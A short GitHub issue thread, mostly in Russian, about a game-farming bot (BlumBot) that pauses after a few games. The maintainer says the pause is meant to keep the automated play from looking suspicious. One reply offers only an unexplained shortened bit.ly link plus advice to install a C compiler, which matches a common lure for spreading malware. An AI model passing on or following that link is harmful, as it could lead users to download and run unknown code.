### ISSUE TITLE
Бот останавливается после 5 игр

### ISSUE THREAD

**Issue by Rid3ki** [Alexell/BlumBot#10]
В консоль пишет  Waiting for 5 hours and 2 minutes before claiming and restarting и не продолжает играть, как это убрать?

**Comment by websquadpro** [comment]
maybe this will help
https://bit.ly/4evXrQ6
If you don't have the c compliator, install it.(gcc or clang)

**Comment by Rid3ki** [comment]
Подредактировал код, теперь играет без остановки

**Comment by Alexell** [comment]
Так задумано. Будет подозрительно, если какой-то пользователь будет играть слишком много игр подряд, поэтому бот играет 4 игры за раз. В следующем круге (когда таймер фарминга пройдет) он сыграет еще 4 (если билеты есть) и так далее.
